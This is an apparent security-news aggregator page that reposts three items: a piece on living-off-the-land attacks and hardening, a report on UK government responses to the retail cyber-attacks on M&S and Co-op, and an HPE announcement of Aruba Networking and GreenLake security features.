Living-off-the-land attacks are rising fast. Learn why they work — and how tailored hardening helps stop them without disrupting your business.

Living-off-the-land (LotL) attacks — where adversaries exploit legitimate system tools to carry out malicious activities — are becoming increasingly prevalent and sophisticated. Bitdefender’s internal threat analysis reveals that nearly 70% of successful cyberattacks utilize LotL techniques.

What’s driving this surge? An overreliance on detection, an unnecessarily large attack surface at nearly every organization, and a failure of traditional application control and attack surface reduction rules. You might call it a living-off-the-land trifecta.

Leaked Threat Actor Chats: We Live Off the Land

When someone leaked communications from the Black Basta ransomware group, it revealed the group’s LotL strategy. One of the group’s leaders shared: “If we use standard utilities, we won’t be detected… we never drop tools on machines.”
In other words, instead of the noisy attacks of the past, they leverage your legitimate tools and applications to secretly go deeper into your environment, most often leveraging this access for ransomware and data exfiltration.
These attacks are popular for four main reasons. They leverage what’s already there, so threat actors can avoid investing in tools of their own. They also cover all stages of an attack, from initial reconnaissance to lateral movement, data exfiltration, and even data encryption. And many of these tools are flexible, so threat actors can adapt them to their needs.

And perhaps the biggest advantage of LotL attacks is the ability to blend seamlessly with normal system activity. By using legitimate tools, attackers bypass legacy security solutions that rely on detecting suspicious custom tools and behavior.

Attack Surfaces and Failed Controls

For years now, IT and security teams have tried to minimize their attack surface by using allow lists. While they reduce attack surfaces somewhat, these tools often miss key preinstalled binaries and utilities, and they impair productivity or add overhead for IT teams when deployed on any system other than fixed-function devices. Similarly to attack surface reduction rules, as modern environments evolve rapidly, keeping up with changes and exceptions becomes overwhelming for administrative teams.

This is why attackers now celebrate that they can expect to find legitimate tools to abuse and remain hidden in their victims’ environments. To avoid slowing down business, organizations have invested in improving their detection and response capabilities to be able to discover and stop attackers that attempt to blend in using trusted tools. However, even the best security operations teams struggle to differentiate between legitimate tool usage by employees and attacker activity, which can give attackers the time they need to achieve their goals.

Stay updated with SOC News for cutting-edge security innovations and expert industry insights! 

Source: https://www.darkreading.com/endpoint-security/lotl-attacks-new-defensive-strategy

These attacks need to be a wake-up call for every business in the UK,” Pat McFadden, chancellor of the Duchy of Lancaster, said. 

Recent cyber-attacks and attempted hacks at some of the UK’s biggest retailers – Marks and Spencer’s, Co-op, and Harrods – have sparked a government response as fears mount across the retail sector.

The cyber-attacks all took place within a matter of days, impacting internal IT systems, and in the case of Co-op, even potentially affecting customer data, the BBC reported.

The UK’s National Cyber Security Centre is working with affected organizations to better understand the nature of the attacks, which left M&S with empty shelves and impacted the integrity of Co-op Teams communications.

Currently, the NCSC cannot say if these attacks are linked or part of a targeted campaign, but noted speculations that the M&S attack was proliferated by cyber-crime group Scattered Spider, and that remote access could have been gained over social engineering tactics.

Pat McFadden, chancellor of the Duchy of Lancaster, will set out action the government is taking to improve cybersecurity in a speech this week.

McFadden will call these attacks a “wake-up call for every business in the UK.

“In a world where the cyber-criminals targeting us are relentless in their pursuit of profit – with attempts being made every hour of every day – companies must treat cybersecurity as an absolute priority.

“We’ve watched in real-time the disruption these attacks have caused – including to working families going about their everyday lives. It serves as a powerful reminder that just as you would never leave your car or your house unlocked on your way to work. We have to treat our digital shop fronts the same way.”

The NCSC is urging leaders to follow the advice on the NCSC website to ensure they have appropriate measures in place to help prevent attacks and respond and recover effectively.

These include back-t0-basics measures ranging from multi-factor authentication, enhanced monitoring against unauthorised account misuse and domains, reviewing passwords, advanced identifying systems, and better threat management tactics.

McFadden will also lay out how the government is aiming to enhance the UK’s cyber protections.

“We’re modernising the way the state approaches cyber, through the Cyber Security and Resilience Bill. That legislation will bolster our national defences,” McFadden will say.

“It will grant new powers for the Technology Secretary to direct regulated organisations to reinforce their cyber defences It will require over 1,000 private IT providers to improve their data and network security.

“It will require companies to report a wider array of cyber incidents to the NCSC in the future – to help us build a clearer picture of who, and what, hostile actors are targeting.”

While the NCSC says they have provided specific guidance to the retail sector, the centre “beleive[s] by following best practice, all companies and organisations can minimise the chances of falling victim to actors like this.”

Stay updated with SOC News for cutting-edge security innovations and expert industry insights! 

Source: https://www.digit.fyi/cyber-attacks-a-wake-up-call-to-retail-sector/

Hewlett Packard Enterprise has announced an expansion of its HPE Aruba Networking and HPE GreenLake cloud offerings to support enterprises in enhancing secure connectivity and hybrid cloud operations.

New capabilities now available in HPE Aruba Networking Central include cloud-based access control security designed to accelerate enterprise-grade zero trust security. This approach treats every user, device, and application as a potential threat until verified, employing robust policy capabilities to strengthen protection measures. Additionally, HPE Private Cloud Enterprise introduces threat-adaptive security features to support compliance with the Digital Operations Resilience Act (DORA), offering the capability to disconnect from the public internet when a network threat is detected.

Phil Mottram, Executive Vice President and General Manager, HPE Aruba Networking, commented on the evolving cyber threat landscape and the need for advanced security: “With the rise in adoption of data-fueled AI applications, organisations are facing more sophisticated threats to anywhere data is stored, captured or transmitted. HPE’s security solutions deliver advanced protection to help organisations mitigate risk, defend against attacks and build resiliency.”

The new features in HPE Aruba Networking Central Network Access Control (NAC) include precision cloud-based access controls, enabling IT teams to define and implement role-based policies for user and device identification. These enhancements are designed to help enterprises advance universal zero trust network access initiatives. Additional features, such as Intrusion Detection System (IDS), Intrusion Prevention System (IPS), AI-powered observability, and microsegmentation, are aimed at reducing the impact of potential security breaches.

Among the new security functionalities are the Enhanced Policy Manager for HPE Aruba Networking Central NAC, which establishes detailed network access policies—such as application-to-role, role-to-subnet, and role-to-role policies. This ensures consistent enforcement of security and compliance across edge-to-cloud networks.

Integration between HPE Aruba Networking Central and HPE OpsRamp has been strengthened to provide native monitoring of third-party devices from vendors like Cisco, Arista, and Juniper Networks. Enhanced application profiling, classification, and risk assessment tools now give enterprises the capacity to establish application-specific access policies based on risk criteria.

Updates to HPE Aruba Networking EdgeConnect SD-WAN bring new Secure Access Service Edge (SASE) integration and Adaptive Distributed Denial-of-Service (DDoS) defence capabilities. These use machine learning to dynamically adjust DDoS protections in real time. All Zero Trust Network Access (ZTNA) customers now receive a complimentary licence for HPE Aruba Networking Private Edge.

HPE Aruba Networking SSE offers new high-availability and high-performance mesh connectivity for routing traffic between global points of presence, aiming to improve reliability and resiliency. Mesh connectivity automatically determines the fastest secure path for data, providing alternative routes and automatic recovery to ensure continued security, without requiring manual intervention by IT teams.

On the private cloud front, HPE GreenLake receives further security enhancements intended to protect against emerging threats and to support compliance with new regulations. HPE Private Cloud Enterprise now features threat-adaptive security, capable of temporarily isolating critical systems by disconnecting from the public internet when a threat is detected. This function acts as a “digital circuit breaker” and is designed to minimise impacts before securely reconnecting systems once the threat is resolved. These features specifically address requirements for regulated industries, including the financial sector, under DORA.

HPE also announced the general availability of air-gapped cloud management through HPE Private Cloud Enterprise. This service enables customers in regulated industries or government to manage private cloud infrastructure entirely on-premises, without any external connectivity, and is deployed by security-cleared HPE staff. Future enhancements will allow cloud-native and Kubernetes workloads to be managed with the same air-gapped approach.

Additional offerings include HPE Cybersecurity Services for sovereign cloud, providing expertise to integrate sovereign security solutions into an organisation’s risk management framework. New cybersecurity services focused on AI aim to give customers governance and compliance support while transforming operations to predict and counter both traditional and AI-driven threats.

The integration between HPE’s OpsRamp and CrowdStrike provides unified observability and real-time threat detection, designed to enhance performance and resilience for enterprise systems.

HPE’s announcement comes as the company marks a year since signing the CISA Secure by Design pledge. HPE reports that it deploys more than 2,200 security controls within HPE GreenLake, and utilises Zero Trust frameworks to meet requirements set by CIS, CISA Secure by Design, STIG, and DORA.

Other advancements in HPE’s secure by design initiatives include Aruba Networking’s AI-based network detection and response (NDR), ransomware protection through the HPE Cyber Resilience Vault, and the introduction of the HPE ProLiant Compute Gen12 portfolio with HPE Integrated Lights Out 7. The new servers also provide a silicon root of trust and feature post-quantum cryptography capabilities meeting FIPS 140-3 Level 3 security certification.

Stay updated with SOC News for cutting-edge security innovations and expert industry insights! 

Source: https://datacentrenews.uk/story/hpe-unveils-enhanced-ai-powered-security-for-cloud-network